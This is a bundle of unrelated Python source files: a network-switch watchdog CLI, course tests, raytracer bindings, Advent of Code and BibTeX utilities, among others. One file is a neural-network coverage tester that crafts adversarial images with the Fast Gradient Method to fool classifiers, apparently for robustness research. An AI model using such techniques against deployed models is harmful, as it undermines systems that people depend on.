self.config_db.mod_entry(
CONFIG_DB_PFC_WD_TABLE_NAME, "GLOBAL",
pfcwd_info
)
# Show stats
class Show(object):
# Show commands
@cli.group()
def show():
""" Show PFC Watchdog information"""
@show.command()
@multi_asic_util.multi_asic_click_options
@click.option('-e', '--empty', is_flag=True)
@click.argument('queues', nargs=-1)
@clicommon.pass_db
def stats(db, namespace, display, empty, queues):
""" Show PFC Watchdog stats per queue """
if (len(queues)):
display = constants.DISPLAY_ALL
PfcwdCli(db, namespace, display).show_stats(empty, queues)
# Show config
@show.command()
@multi_asic_util.multi_asic_click_options
@click.argument('ports', nargs=-1)
@clicommon.pass_db
def config(db, namespace, display, ports):
""" Show PFC Watchdog configuration """
PfcwdCli(db, namespace, display).config(ports)
# Start WD
class Start(object):
@cli.command()
@click.option(
'--action', '-a', type=click.Choice(['drop', 'forward', 'alert'])
)
@click.option('--restoration-time', '-r', type=click.IntRange(100, 60000))
@click.argument('ports', nargs=-1)
@click.argument('detection-time', type=click.IntRange(100, 5000))
@clicommon.pass_db
def start(db, action, restoration_time, ports, detection_time):
"""
Start PFC watchdog on port(s). To config all ports, use all as input.
Example:
sudo pfcwd start --action drop ports all detection-time 400 --restoration-time 400
"""
PfcwdCli(db).start(
action, restoration_time, ports, detection_time
)
# Set WD poll interval
class Interval(object):
@cli.command()
@click.argument('poll_interval', type=click.IntRange(100, 3000))
@clicommon.pass_db
def interval(db, poll_interval):
""" Set PFC watchdog counter polling interval """
PfcwdCli(db).interval(poll_interval)
# Stop WD
class Stop(object):
@cli.command()
@click.argument('ports', nargs=-1)
@clicommon.pass_db
def stop(db, ports):
""" Stop PFC watchdog on port(s) """
PfcwdCli(db).stop(ports)
# Set WD default configuration on server facing ports when enable flag is on
class StartDefault(object):
@cli.command("start_default")
@clicommon.pass_db
def start_default(db):
""" Start PFC WD by default configurations """
PfcwdCli(db).start_default()
# Enable/disable PFC WD counter polling
class CounterPoll(object):
@cli.command('counter_poll')
@click.argument('counter_poll', type=click.Choice(['enable', 'disable']))
@clicommon.pass_db
def counter_poll(db, counter_poll):
""" Enable/disable counter polling """
PfcwdCli(db).counter_poll(counter_poll)
# Enable/disable PFC WD BIG_RED_SWITCH mode
class BigRedSwitch(object):
@cli.command('big_red_switch')
@click.argument('big_red_switch', type=click.Choice(['enable', 'disable']))
@clicommon.pass_db
def big_red_switch(db, big_red_switch):
""" Enable/disable BIG_RED_SWITCH mode """
PfcwdCli(db).big_red_switch(big_red_switch)
def get_pfcwd_clis():
cli.add_command(BigRedSwitch().big_red_switch)
cli.add_command(CounterPoll().counter_poll)
cli.add_command(StartDefault().start_default)
cli.add_command(Stop().stop)
cli.add_command(Interval().interval)
cli.add_command(Start().start)
cli.add_command(Show().show)
return cli
if __name__ == '__main__':
cli = get_pfcwd_clis()
cli()
|
import datetime
from pathlib import Path
import pytest
import dateutil
from naucse import models
TZINFO = dateutil.tz.gettz('Europe/Prague')
@pytest.fixture
def model():
path = Path(__file__).parent / 'fixtures/test_content'
return models.Root(path)
def test_run_with_times(model):
run = model.runs[2000, 'run-with-times']
assert run.default_start_time == datetime.time(19, 00, tzinfo=TZINFO)
assert run.default_end_time == datetime.time(21, 00, tzinfo=TZINFO)
lesson = run.sessions['normal-lesson']
assert lesson.date == datetime.date(2000, 1, 1)
assert lesson.start_time == datetime.datetime(2000, 1, 1, 19, 00,
tzinfo=TZINFO)
assert lesson.end_time == datetime.datetime(2000, 1, 1, 21, 00,
tzinfo=TZINFO)
def test_run_without_times(model):
run = model.runs[2000, 'run-without-times']
assert run.default_start_time is None
assert run.default_end_time is None
lesson = run.sessions['normal-lesson']
assert lesson.date == datetime.date(2000, 1, 1)
assert lesson.start_time is None
assert lesson.end_time is None
def test_course(model):
course = model.courses['normal-course']
assert course.default_start_time is None
assert course.default_end_time is None
lesson = course.sessions['normal-lesson']
assert lesson.date is None
assert lesson.start_time is None
assert lesson.end_time is None
|
import argparse
import sys
import os
from datetime import datetime
from tensorflow.keras.models import *
from tensorflow.keras.datasets import cifar10
from tensorflow.keras.datasets import mnist
from tensorflow.keras.applications.vgg16 import VGG16
from tensorflow.keras.preprocessing.image import load_img
from tensorflow.keras.layers import *
from tensorflow.keras import *
from utils import *
from ssc import *
from art.attacks.evasion import FastGradientMethod
from art.estimators.classification import KerasClassifier
# def run_ssc(test_object, outs):
# f_results, cover_layers, _ = ssc_setup (test_object, outs)
# d_advs=[]
# append_in_file (f_results,
# '#ssc runs; #test cases; #adversarial examples; is feasible; is top-1 adversarial example; is top-x adversarial example; condition feature size; L infinity distance; L0 distance; decision layer index; dec feature; #condition layer neurons; new labels; original labels; coverage; local coverage\n')
# tot_decs=0
# if test_object.layer_indices==None:
# # for i in range(1, len(cover_layers)):
# for cl in cover_layers:
# assert not (is_input_layer(test_object.dnn.layers[cl.layer_index - 1]))
# csp=cl.layer.input.shape
# dsp=cl.ssc_map.shape
# if is_dense_layer(cl.layer) or not (csp[1]==dsp[1] and csp[2]==dsp[2]):
# tot_decs+=cl.ssc_map.size
# else:
# ks=cl.layer.kernel_size
# sp=cl.ssc_map.shape
# tot_decs+=((sp[1]-ks[0]+1)*(sp[2]-ks[1]+1)*sp[3])
# else:
# print (test_object.layer_indices, test_object.feature_indices)
# for cl in cover_layers:
# assert not (is_input_layer(test_object.dnn.layers[cl.layer_index - 1]))
# if cl.layer_index in test_object.layer_indices:
# csp=cl.layer.input.shape
# dsp=cl.ssc_map.shape
# if is_dense_layer(cl.layer) or not (csp[1]==dsp[1] and csp[2]==dsp[2]):
# tmp_decs=cl.ssc_map.size
# else:
# ks=cl.layer.kernel_size
# dsp=cl.ssc_map.shape
# tmp_decs=((dsp[1]-ks[0]+1)*(dsp[2]-ks[1]+1)*dsp[3])
# if is_conv_layer(cl.layer):
# if not test_object.feature_indices==None:
# # print ('**', tmp_decs)
# tmp_decs=tmp_decs*(len(test_object.feature_indices)*1.0/dsp[3])
# # print ('**', tmp_decs)
# tot_decs+=tmp_decs
# print ('== Total decisions: {0} ==\n'.format(tot_decs))
# tot_coverage=0.0
# ## define a global attacker
# classifier=KerasClassifier(clip_values=(MIN, -MIN), model=test_object.dnn)
# # print (classifier.__bases__)
# # classifier.run_eagerly = True
# adv_crafter = FastGradientMethod(classifier)
# # print (adv_crafter.__bases__)
# test_cases=[]
# adversarials=[]
# count=0
# print ('== Enter the coverage loop ==\n')
# ite=0
# while True:
# ite+=1
# dec_layer_index, dec_pos=get_ssc_next(cover_layers, test_object.layer_indices, test_object.feature_indices)
# dec_layer=cover_layers[dec_layer_index]
# dec_layer.ssc_map.itemset(dec_pos, False)
# assert dec_layer.prev_layer_index is not None
# cond_layer = test_object.dnn.layers[dec_layer.prev_layer_index]
# if is_padding(dec_pos, dec_layer, cond_layer, post = True):
# print ('padding')
# continue
# cond_cover = np.zeros(cond_layer.output.shape[1:], dtype=bool)
# tot_conds = cond_cover.size
# if is_conv_layer(cond_layer):
# csp = dec_layer.layer.input.shape
# dsp = cond_layer.output.shape
# if (csp[1]==dsp[1] and csp[2]==dsp[2]):
# ks = cond_layer.kernel_size
# tot_conds = ((dsp[1]-ks[0]+1)*(dsp[2]-ks[1]+1)*dsp[3])
# print ('==== Decision layer: {0}, decision pos: {1} ===='.format(dec_layer, dec_pos))
# print ('==== Conditions layer: {0} ====\n'.format(cond_layer.name))
# non_increasing=0
# step_coverage=0
# while not (step_coverage>=1.0 or non_increasing>=10):
# count+=1
# d_min, d_norm, new_image, old_image, old_labels, cond_diff_map = ssc_search(test_object, cond_layer, None, dec_layer, dec_pos, adv_crafter)
# print ('====== #Condition changes: {0}, norm distance: {1} ======\n'.format( d_min, d_norm))
# feasible=(d_min<=test_object.cond_ratio*np.prod(cond_layer.output.shape[1:]) or d_min==1)
# top1_adv_flag=False
# top5_adv_flag=False
# y1s=[]
# y2s=[]
# y1_flag=False
# y2_flag=False
# labels=test_object.labels
# l0_d=None
# top_classes=test_object.top_classes
# inp_ub=test_object.inp_ub
# found_new=True
# if feasible:
# cond_cover=np.logical_or(cond_cover, cond_diff_map)
# covered=np.count_nonzero(cond_cover)
# new_step_coverage=covered*1.0/tot_conds
# if new_step_coverage==step_coverage:
# non_increasing+=1
# found_new=False
# else:
# non_increasing=0
# step_coverage=new_step_coverage
# if feasible and found_new:
# test_cases.append((new_image, old_image))
# if inp_ub==255:
# new_image=new_image.astype('uint8')
# old_image=old_image.astype('uint8')
# diff_image=np.abs(new_image-old_image)
# else:
# new_image_=new_image*255.0/inp_ub
# old_image_=old_image*255.0/inp_ub
# new_image_=new_image_.astype('uint8')
# old_image_=old_image_.astype('uint8')
# diff_image=np.abs(new_image_-old_image_)
# l0_d=np.count_nonzero(diff_image)/(new_image.size*1.0)
# y1s=(np.argsort(test_object.dnn.predict(np.array([new_image]))))[0][-top_classes:]
# y2s=(np.argsort(test_object.dnn.predict(np.array([old_image]))))[0][-top_classes:]
# if y1s[top_classes-1]!=y2s[top_classes-1]: top1_adv_flag=True
# if labels==None: labels=old_labels
# #print (labels, y1s, y2s)
# for label in labels:
# if label in y1s: y1_flag=True
# if label in y2s: y2_flag=True
# if y1_flag!=y2_flag: top5_adv_flag=True
# if top5_adv_flag:
# print ('******** This is an adversarial example ********\n')
# adversarials.append((new_image, old_image))
# test_object.save_adversarial_example (
# (new_image, '{0}-adv-{1}'.format(len(adversarials), y1s[top_classes-1])),
# (old_image, '{0}-original-{1}'.format(len(adversarials), y2s[top_classes-1])),
# diff = (diff_image, '{0}-diff'.format(len(adversarials))),
# directory = outs)
# adv_flag=True
# d_advs.append(d_norm)
# if len(d_advs)%100==0:
# print_adversarial_distribution(d_advs, f_results.replace('.txt', '')+'-adversarial-distribution.txt')
# #elif y1s[0]==y2s[0]:
# # adversarials.append((new_image, old_image))
# # save_adversarial_examples([new_image/(inp_ub*1.0), 't{0}-{1}'.format(len(test_cases), y1s[top_classes-1])], [old_image/(inp_ub*1.0), 't{0}-original-{1}'.format(len(test_cases), y2s[top_classes-1])], None, f_results.split('/')[0])
# elif feasible:
# print ("******** Already found ********\n")
# else:
# print ("******** Not feasible ********\n")
# #print ('f_results: ', f_results)
# f = open(f_results, "a")
# f.write('{0} {1} {2} {3} {4} {5} {6} {7} {8} {9} {10} {11} {12} {13} {14} {15}\n'.format(count, len(test_cases), len(adversarials), feasible, top1_adv_flag, top5_adv_flag, d_min, d_norm, l0_d, dec_layer.layer_index, dec_pos, np.prod (cond_layer.output.shape[1:]), y1s, y2s, tot_coverage+step_coverage/tot_decs, step_coverage))
# f.close()
# #######
# if not feasible: break
# #######
# tot_coverage+=step_coverage/tot_decs
# ## todo: this is a shortcut
# if not np.any(dec_layer.ssc_map):
# print ('all decision features at layer {0} have been covered'.format(dec_layer.layer_index))
# sys.exit(0)
from engine import CoverableLayer
def run_svc(test_object, outs):
print ('To run svc\n')
setup_layer = \
lambda l, i, **kwds: CoverableLayer (layer = l, layer_index = i, **kwds)
cover_layers = get_cover_layers (test_object.dnn, setup_layer,
layer_indices = test_object.layer_indices,
activation_of_conv_or_dense_only = True,
exclude_direct_input_succ = True)
f_results = outs.stamped_filename ('SVC_report', suff = '.txt')
## define a global attacker
classifier = KerasClassifier(clip_values=(MIN, -MIN), model=test_object.dnn)
adv_crafter = FastGradientMethod(classifier)
test_cases=[]
adversarials=[]
count=0
while True:
dec_layer_index, dec_pos=get_ssc_next(cover_layers)
if dec_layer_index==1 and is_input_layer(test_object.dnn.layers[0]): continue
print ('dec_layer_index', cover_layers[dec_layer_index].layer_index)
###
cond_layer=cover_layers[dec_layer_index-1]
dec_layer=cover_layers[dec_layer_index]
cond_cover=np.ones(cond_layer.ssc_map.shape, dtype=bool)
###
## skip if dec_pos is a padding
if is_padding (dec_pos, dec_layer, cond_layer):
continue
cond_pos=np.random.randint(0, cond_cover.size)
print ('cond, dec layer index: ', cond_layer.layer_index, dec_layer.layer_index)
print ('dec_layer_index: ', cover_layers[dec_layer_index].layer_index)
count+=1
dec_ub=dec_layer.ubs.item(dec_pos)+0.001
#for act in activations[dec_layer.layer_index]:
# v=act.item(dec_pos)
# if v>dec_ub: dec_ub=v
print ('dec_ub: ', dec_ub)
d_min, d_norm, new_image, old_image = svc_search(test_object, cond_layer, cond_pos, dec_layer, dec_pos, adv_crafter, dec_ub)
print ('d_min is', d_min, 'd_norm is', d_norm)
feasible=(d_min<=test_object.cond_ratio*cond_layer.ssc_map.size or d_min==1)
top1_adv_flag=False
top5_adv_flag=False
top5b_adv_flag=False
y1s=[]
y2s=[]
y1_flag=False
y2_flag=False
labels=test_object.labels #[555, 920]
l0_d=None
top_classes=test_object.top_classes
inp_ub=test_object.inp_ub
if feasible:
test_cases.append((new_image, old_image))
if inp_ub==255:
new_image=new_image.astype('uint8')
old_image=old_image.astype('uint8')
diff_image=np.abs(new_image-old_image)
l0_d=np.count_nonzero(diff_image)/(new_image.size*1.0)
y1s=(np.argsort(test_object.dnn.predict(np.array([new_image]))))[0][-top_classes:]
y2s=(np.argsort(test_object.dnn.predict(np.array([old_image]))))[0][-top_classes:]
if y1s[top_classes-1]!=y2s[top_classes-1]: top1_adv_flag=True
if not y1s[top_classes-1] in y2s: top5b_adv_flag=True
for label in labels:
if label in y1s: y1_flag=True
if label in y2s: y2_flag=True
if y1_flag!=y2_flag: top5_adv_flag=True
if top5_adv_flag:
print ('found an adversarial example')
adversarials.append((new_image, old_image))
save_an_image(new_image/(inp_ub*1.0), '{0}-adv-{1}.png'.format(len(adversarials), y1s[top_classes-1]),
f_results.split('/')[0])
save_an_image(old_image/(inp_ub*1.0), '{0}-original-{1}.png'.format(len(adversarials), y2s[top_classes-1]),
f_results.split('/')[0])
save_an_image(diff_image/(inp_ub*1.0), '{0}-diff.png'.format(len(adversarials)),
f_results.split('/')[0])
adv_flag=True
else:
print ("not feasible")
append_in_file (f_results,
'{0} {1} {2} {3} {4} {5} {6} {7} {8} {9} {10} {11} {12} {13}\n'
.format(count, len(test_cases), len(adversarials),
feasible, top1_adv_flag, top5_adv_flag, top5b_adv_flag,
d_min, d_norm, l0_d, dec_layer.layer_index,
cond_layer.ssc_map.size, y1s, y2s))
|
from cffi import FFI
from PIL import Image
ffi = FFI()
ffi.cdef("""
typedef struct {
double x, y, z;
} point_t;
typedef struct {
double x, y, z;
} vector_t;
typedef struct {
float red, green, blue;
} color_t;
typedef void* coloration;
coloration coloration_color_new(float red, float green, float blue);
coloration coloration_texture_new(char *path);
void coloration_free(coloration);
typedef void* surfacetype;
surfacetype surfacetype_diffuse_new();
surfacetype surfacetype_reflective_new(float reflectivity);
surfacetype surfacetype_refractive_new(float index, float transparency);
void surfacetype_free(surfacetype);
typedef struct {
coloration coloration;
surfacetype surface;
float albedo;
} material_t;
typedef struct {
uint32_t x, y, width, height;
} block_t;
typedef void* scene;
scene scene_new(uint32_t width, uint32_t height,
double fov, double shadow_bias, uint32_t max_recursion_depth);
scene scene_from_json(char *buffer);
void scene_add_sphere(scene, const point_t *center, double radius,
const material_t *material);
void scene_add_plane(scene, const point_t *origin, const vector_t *normal,
const material_t *material);
void scene_add_spherical_light(scene, const point_t *position,
const color_t *color, float intensity);
void scene_add_directional_light(scene, const vector_t *direction,
const color_t *color, float intensity);
void scene_render(scene, const block_t *block, char *buffer, size_t length);
char *scene_get_json(scene);
void scene_free(scene);
void string_free(char *string);
""")
C = ffi.dlopen("./../raytracer/ffi/target/release/raytracer_ffi.dll")
def point(x, y, z):
point = ffi.new("point_t *")
point.x = x
point.y = y
point.z = z
return point
def vector(x, y, z):
vector = ffi.new("vector_t *")
vector.x = x
vector.y = y
vector.z = z
return vector
def color(red, green, blue):
color = ffi.new("color_t *")
color.red = red
color.green = green
color.blue = blue
return color
def material(coloration, surface, albedo):
material = ffi.new("material_t *")
material.coloration = coloration.get_raw()
material.surface = surface.get_raw()
material.albedo = albedo
return material
def block(x, y, width, height):
block = ffi.new("block_t *")
block.x = x
block.y = y
block.width = width
block.height = height
return block
class Scene(object):
def __init__(self, width, height, obj):
self.__x = 0
self.__y = 0
self.__width = width
self.__height = height
self.__obj = obj
@property
def width(self):
return self.__width
@property
def height(self):
return self.__height
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
C.scene_free(self.__obj)
self.__obj = None
def add_sphere(self, center, radius, material):
C.scene_add_sphere(self.__obj, center, radius, material)
def add_plane(self, origin, normal, material):
C.scene_add_plane(self.__obj, origin, normal, material)
def add_spherical_light(self, position, color, intensity):
C.scene_add_spherical_light(self.__obj, position, color, intensity)
def add_directional_light(self, direction, color, intensity):
C.scene_add_directional_light(self.__obj, direction, color, intensity)
def set_viewport(self, x, y, width, height):
self.__x = x
self.__y = y
self.__width = width
self.__height = height
def render_image(self):
pixel_format = "RGBA" #The raytracer only supports one format
return Image.frombuffer(pixel_format, (self.__width, self.__height),
self.render_bytes(), "raw", pixel_format, 0, 1)
def render_bytes(self):
bytes_per_pixel = 4
buffer_len = self.__width * self.__height * bytes_per_pixel
buffer = ffi.new("char[]", buffer_len)
view_block = block(self.__x, self.__y, self.__width, self.__height)
C.scene_render(self.__obj, view_block, buffer, buffer_len)
return ffi.buffer(buffer)
def get_json(self):
json_raw = C.scene_get_json(self.__obj)
try:
json_str = ffi.string(json_raw)
return json_str
finally:
C.string_free(json_raw)
@staticmethod
def from_json(json):
c_json = ffi.new("char[]", json)
obj = C.scene_from_json(c_json)
return Scene(None, None, obj)
@staticmethod
def create(width, height, fov, shadow_bias, max_recursion_depth):
obj = C.scene_new(width, height, fov, shadow_bias, max_recursion_depth)
return Scene(width, height, obj)
class Coloration(object):
@staticmethod
def color(red, green, blue):
coloration = C.coloration_color_new(red, green, blue)
return Coloration(coloration)
@staticmethod
def texture(path):
c_path = ffi.new("char[]", str(path).encode())
coloration = C.coloration_texture_new(c_path)
return Coloration(coloration)
def __init__(self, obj):
self.__obj = obj;
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
C.coloration_free(self.__obj)
self.__obj = None
def get_raw(self):
return self.__obj
class SurfaceType(object):
@staticmethod
def diffuse():
surfacetype = C.surfacetype_diffuse_new();
return SurfaceType(surfacetype)
@staticmethod
def reflective(reflectivity):
surfacetype = C.surfacetype_reflective_new(reflectivity);
return SurfaceType(surfacetype)
@staticmethod
def refractive(index, transparency):
surfacetype = C.surfacetype_refractive_new(index, transparency);
return SurfaceType(surfacetype)
def __init__(self, obj):
self.__obj = obj;
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
C.surfacetype_free(self.__obj)
self.__obj = None
def get_raw(self):
return self.__obj
|
import pandas as pd
import numpy as np
class DataSet(object):
def __init__(self):
pass
def append(self):
pass
def sample(self):
pass
def clear(self):
pass
class NPArrayDataSet(DataSet):
def __init__(self,X,Y, batch_mode=False, batch_size=32):
self.X = X
self.Y = Y
self.Xshape = X.shape
self.batch_mode = batch_mode
self.batch_size = batch_size
def sample():
if not self.batch_mode:
return (self.X,self.Y)
else:
ids = np.random.choice(self.Xshape[0],self.batch_size)
return (X[ids],Y[ids])
def clear():
self.X = None
self.Y = None
class DataframeDataSet(DataSet):
def __init__(self,file_path):
self.data = pd.read_csv(file_path)
def sample(self):
return self.data
def clear(self):
self.data = None
class ListDataSet(DataSet):
def __init__(self, batch_mode=False, batch_size=32):
self.data = []
self.batch_mode = batch_mode
self.batch_size = batch_size
def append(self,d):
self.data.append(d)
def sample(self):
if self.batch_mode == False:
return self.data
else:
ids = np.random.choice(len(self.data),self.batch_size)
return [self.data[i] for i in ids]
def clear(self):
self.data = []
class LookbackDataSet(ListDataSet):
def __init__(self,lookback):
super(LookbackDataSet,self).__init__()
self.lookback = lookback
def sample(self):
return self.data[-self.lookback:]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
##
# This file is part of Sardana
##
# http://www.sardana-controls.org/
##
# Copyright 2011 CELLS / ALBA Synchrotron, Bellaterra, Spain
##
# Sardana is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
__docformat__ = "restructuredtext"
"""
Release data for the sardana project. It contains the following members:
- version : (str) version string
- description : (str) brief description
- long_description : (str) a long description
- license : (str) license
- authors : (dict<str, tuple<str,str>>) the list of authors
- url : (str) the project url
- download_url : (str) the project download url
- platforms : list<str> list of supported platforms
- keywords : list<str> list of keywords
"""
#: Name of the package for release purposes. This is the name which labels
#: the tarballs and RPMs made by distutils, so it's best to lowercase it.
name = 'sardana'
# we use semantic versioning (http://semver.org/) and we update it using the
# bumpversion script (https://github.com/peritus/bumpversion)
version = '3.0.4.11'
description = "instrument control and data acquisition system"
long_description = \
'''Sardana is a Supervision, Control And Data Acquisition (SCADA) system for
scientific installations. It is written in Python and based on the TANGO
library. The hardware control and data acquisition routines can be
accessed via an IPython console and a generic graphical user interface
(both of which are easily extensible by the user).'''
license = 'LGPL'
authors = {'Tiago_et_al': ('Tiago Coutinho et al.', ''),
'Community': ('Sardana Community',
'sardana-devel@lists.sourceforge.net'),
}
url = 'http://www.sardana-controls.org'
download_url = 'http://pypi.python.org/packages/source/s/sardana'
platforms = ['Linux', 'Windows XP/2000/NT', 'Windows 95/98/ME']
keywords = ['Sardana', 'Tango', 'Python', 'Control System']
|
import asyncio
# A wrapper class for asyncio.Future so we can use errorBacks
# (also so I don't have to change a hundred lines of code...)
class Deferred:
def __init__(self):
self.f = asyncio.Future()
def __cb(self, fut, func):
# might want to remove .done() check to better catch errors
# (.result() throws an error if not done)
if fut.done() and fut.result():
return func(fut.result())
return None # should I return an exception instead?
def addCallback(self, func):
self.f.add_done_callback(lambda fut: self.__cb(fut,func))
def callback(self, res):
self.f.set_result(res)
return self.f # is this necessary?
def __eb(self, fut, func):
# might want to remove .done() check to better catch errors
# (.exception() throws an error if not done)
if fut.done() and fut.exception():
return func(fut.exception())
return None # should I return an exception instead?
def addErrback(self, func):
self.f.add_done_callback(lambda fut: self.__eb(fut,func))
def errback(self, exc):
self.f.set_exception(exc)
return self.f # is this necessary?
|
import asyncio
from pipelines.plumber import Plumber
from test_workflow import StringFunc
def getcoro(name):
d = {
'StringFunc.reverse' : StringFunc.reverse,
'StringFunc.toupper' : StringFunc.toupper,
'StringFunc.tolower' : StringFunc.tolower,
'StringFunc.input_str': StringFunc.input_str,
'StringFunc.output_str': StringFunc.output_str,
}
if callable(name):
return name
else:
return d[name]
async def main():
input_d = {
'nodes': {
'inp': {'coro': StringFunc.input_str, 'args': { 'num': 20 }},
'n1' : {'coro': StringFunc.reverse },
'n2' : {'coro': 'StringFunc.toupper'},
'n3' : {'coro': 'StringFunc.tolower'},
'n4' : {'coro': 'StringFunc.output_str', 'properties': {'aggregate_inputs': False}},
},
'graph': {
'inp': ('n1',),
'n1' : ('n2', 'n3'),
'n2' : ('n3', 'n4'),
'n3' : ('n4',),
'n4' : None,
},
}
_t = Plumber(input_d, coro_map = getcoro )
_t.create_pipeline()
for _q in _t.nodes:
print(f':. name ~> {_q.name}., input ~> {_q.liason_queues[0]}, output~> {_q.liason_queues[1]}')
for _q in _t.nodes:
print(f":. name ~> {_q.name}, coro ~> {_q.processor_coro}")
if __name__ == '__main__':
asyncio.get_event_loop().create_task(main())
asyncio.get_event_loop().run_forever()
|
import re
from itertools import cycle
########
# PART 1
'''
Vixen can fly 8 km/s for 8 seconds, but then must rest for 53 seconds.
Blitzen can fly 13 km/s for 4 seconds, but then must rest for 49 seconds.
Rudolph can fly 20 km/s for 7 seconds, but then must rest for 132 seconds.
Cupid can fly 12 km/s for 4 seconds, but then must rest for 43 seconds.
Donner can fly 9 km/s for 5 seconds, but then must rest for 38 seconds.
Dasher can fly 10 km/s for 4 seconds, but then must rest for 37 seconds.
Comet can fly 3 km/s for 37 seconds, but then must rest for 76 seconds.
Prancer can fly 9 km/s for 12 seconds, but then must rest for 97 seconds.
Dancer can fly 37 km/s for 1 seconds, but then must rest for 36 seconds.
'''
def process_line(line):
m = re.match(r"(.*) can fly (\d+) km/s for (\d+) seconds, but then must rest for (\d+) seconds.", line)
return m.group(1), int(m.group(2)), int(m.group(3)), int(m.group(4))
def process_file(fn):
with open(fn, 'r') as f:
ret = {}
for line in f:
deer, speed, time, wait = process_line(line)
ret[deer] = [(speed, time), (0, wait)]
return ret
def move(deer, time):
dist = 0
c = cycle(deer)
while (time > 0):
curr = next(c)
this_run = min(time, curr[1])
dist += curr[0] * this_run
time -= this_run
return dist
def run(deers, t):
final_dists = []
for speeds in deers.values():
dist = move(speeds, t)
final_dists += [dist]
return max(final_dists)
deers = {}
deers['comet'] = [(14, 10), (0, 127)]
deers['dancer'] = [(16, 11), (0, 162)]
assert run(deers, 1000) == 1120
deers = process_file("event2015/day14/input.txt")
time = 2503
answer = run(deers, time)
print("Part 1 =", answer)
assert answer == 2655 # check with accepted answer
########
# PART 2
scores = { deer: (0,0) for deer in deers }
for t in range(1, time + 1):
for deer, speeds in deers.items():
dist = move(speeds, t)
scores[deer] = (scores[deer][0], dist)
first_place = max([dist for (_, (_, dist)) in scores.items()])
for deer, (score, dist) in scores.items():
scores[deer] = (score + 1, dist) if dist == first_place else (score, dist)
#print(sorted(scores.items(), key = lambda x: x[1][0], reverse = True))
answer = max([x for x, _ in scores.values()])
print("Part 2 =", answer)
assert answer == 1059 # check with accepted answer
|
#!/Library/Frameworks/Python.framework/Versions/3.6/bin/python3
### /usr/bin/python
### /Library/Frameworks/Python.framework/Versions/3.6/bin/python3
"""
This Python script is written by Zhiyang Ong to determine if
a BibTeX key is valid.
Synopsis:
Check the validity of a BibTeX key.
Notes/Assumptions:
Assume that a BibTeX key has no white space, and is a
contiguous sequence of alphanumeric characters.
If a BibTeX key contains characters that are not alphanumeric,
it is invalid.
If a BibTeX key contains white space, it is invalid.
While the BibTeX key can contain different symbols, apart
from commas, only alphanumeric characters shall be used
\cite{Ong2017}.
Tokenize the first line of each BibTeX entry such that it
would contain exactly two tokens: the BibTeX entry type
(without the "@" prefix) and the BibTeX key.
When the first line of a BibTeX entry is tokenized, its
first token shall match a standard BibTeX entry type,
and its second token shall be its BibTeX key.
If the first token does not match a standard BibTeX entry type,
raise an exception to inform the users of this error.
If the second token is an empty string or missing, raise
an exception to inform the users that the BibTeX key
is missing.
If more than two tokens (i.e., three or more) exist, raise
an exception to inform the users about the non-compliance
to guidelines \cite{Ong2017} for managing the database.
Revision History:
December 19, 2017 Version 0.1, initial build.
"""
__author__ = 'Zhiyang Ong'
__version__ = '1.0'
__date__ = 'December 19, 2017'
# The MIT License (MIT)
# Copyright (c) <2014-2017> <Zhiyang Ong>
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Email address: echo "cukj -wb- 23wU4X5M589 TROJANS cqkH wiuz2y 0f Mw Stanford" | awk '{ sub("23wU4X5M589","F.d_c_b. ") sub("Stanford","d0mA1n"); print $5, $2, $8; for (i=1; i<=1; i++) print "6\b"; print $9, $7, $6 }' | sed y/kqcbuHwM62z/gnotrzadqmC/ | tr 'q' ' ' | tr -d [:cntrl:] | tr -d 'ir' | tr y "\n" Che cosa significa?
###############################################################
"""
Import modules from The Python Standard Library.
sys Get access to any command-line arguments.
os Use any operating system dependent functionality.
os.path For pathname manipulations.
subprocess -> call
To make system calls.
time To measure elapsed time.
warnings Raise warnings.
re Use regular expressions.
collections -> namedtuple
To use named tuples.
operator -> attrgetter
To manipulate attributes of a named tuple as callable
objects.
string Get access to string-specific methods.
"""
#import sys
#import os
#import os.path
#from subprocess import call
#import time
import warnings
import re
#from collections import namedtuple
#from operator import attrgetter
import string
###############################################################
# Import Custom Python Modules
# Module to process input arguments to the script/program.
from utilities.queue_ip_arguments import queue_ip_args
###############################################################
"""
Module with methods that check the validity of a BibTeX key.
Support for class instantiation is not provided, to avoid
acquiring a collection of useless "check_bibtex_key"
objects.
Check if all methods return a boolean TRUE to indicate that
all the conditions required for a valid BibTeX key are
TRUE, or indicate the condition(s) that cause the BibTeX
key to be invalid.
Check if none of the characters in the string are whitespace
characters; that is, check that the string has no white
space.
Check if all the characters in the string are alphanumeric
characters; there are no special characters in the string.
"""
class check_bibtex_key:
# =========================================================
# Method to check the validity of a BibTeX key.
# @param str - A string containing the BibTeX key.
# @return a boolean TRUE if the BibTeX key is valid.
# Else, return FALSE.
# O(n) method, where n is the number of characters of the key.
@staticmethod
def is_bibtex_key_valid(str):
if has_no_whitespace(str) and has_only_alphanumeric_characters(str):
return True
else:
return False
# =========================================================
# Method to check if the BibTeX key has white space.
#
# Implementation (1):
# Tokenize the BibTeX key using white space as
# delimiters.
